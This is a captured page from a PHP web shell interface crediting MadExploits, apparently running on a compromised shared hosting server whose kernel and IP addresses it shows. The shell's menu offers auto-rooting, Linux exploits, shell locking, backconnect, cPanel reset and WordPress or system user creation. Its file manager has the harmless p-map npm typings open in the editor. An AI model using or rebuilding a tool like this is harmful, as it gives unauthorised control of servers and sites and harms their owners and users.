Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.142.245.158
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
alt-nodejs16 /
root /
usr /
lib /
node_modules /
npm /
node_modules.bundled /
p-map /
[ HOME SHELL ]
Name
Size
Permission
Action
index.d.ts
1.94
KB
-rw-r--r--
index.js
1.6
KB
-rw-r--r--
license
1.09
KB
-rw-r--r--
package.json
911
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.d.ts
declare namespace pMap { interface Options { /** Number of concurrently pending promises returned by `mapper`. Must be an integer from 1 and up or `Infinity`. @default Infinity */ readonly concurrency?: number; /** When set to `false`, instead of stopping when a promise rejects, it will wait for all the promises to settle and then reject with an [aggregated error](https://github.com/sindresorhus/aggregate-error) containing all the errors from the rejected promises. @default true */ readonly stopOnError?: boolean; } /** Function which is called for every item in `input`. Expected to return a `Promise` or value. @param element - Iterated element. @param index - Index of the element in the source array. */ type Mapper<Element = any, NewElement = unknown> = ( element: Element, index: number ) => NewElement | Promise<NewElement>; } /** @param input - Iterated over concurrently in the `mapper` function. @param mapper - Function which is called for every item in `input`. Expected to return a `Promise` or value. @returns A `Promise` that is fulfilled when all promises in `input` and ones returned from `mapper` are fulfilled, or rejects if any of the promises reject. The fulfilled value is an `Array` of the fulfilled values returned from `mapper` in `input` order. @example ``` import pMap = require('p-map'); import got = require('got'); const sites = [ getWebsiteFromUsername('https://sindresorhus'), //=> Promise 'https://ava.li', 'https://github.com' ]; (async () => { const mapper = async site => { const {requestUrl} = await got.head(site); return requestUrl; }; const result = await pMap(sites, mapper, {concurrency: 2}); console.log(result); //=> ['https://sindresorhus.com/', 'https://ava.li/', 'https://github.com/'] })(); ``` */ declare function pMap<Element, NewElement>( input: Iterable<Element>, mapper: pMap.Mapper<Element, NewElement>, options?: pMap.Options ): Promise<NewElement[]>; export = pMap;
Close